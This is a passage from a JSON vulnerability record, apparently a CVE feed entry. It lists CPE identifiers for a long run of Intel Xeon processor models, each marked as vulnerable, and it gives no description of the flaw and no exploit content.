"cpe:2.3:h:intel:xeon:l5609:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5618:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5630:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5638:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5640:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l7545:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l7555:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:lc5518:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:lc5528:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w3670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w3680:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w3690:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w5580:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:w5590:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3430:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3440:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3450:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3460:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3470:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3480:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5570:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5647:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5650:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5660:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5667:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5672:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5675:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5677:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5680:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5687:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5690:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x6550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x7542:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x7550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x7560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_bronze_3104:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_bronze_3106:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e-1105c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1505m_v6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1515m_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1535m_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1535m_v6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1545m_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1558l_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1565l_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1575m_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1578l_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1585_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1585l_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1105c_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1125c:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1125c_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_12201:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_12201_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1226_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1231_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1235:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1235l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1241_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1246_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1258l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1260l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1260l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1268l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1268l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1271_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1276_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1278l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1281_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1286_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1286l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1290:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1290_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1501l_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1501m_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505l_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505l_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505m_v5:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2650l_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658a_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2665:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2683_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2683_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2687w_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697a_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2698_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2698_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699a_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2699r_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4603:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4603_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4607_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4617:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4624l_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4628l_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4640_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4648_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4650l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4655_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4655_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4657l_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4660_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4660_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4667_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4667_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4669_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 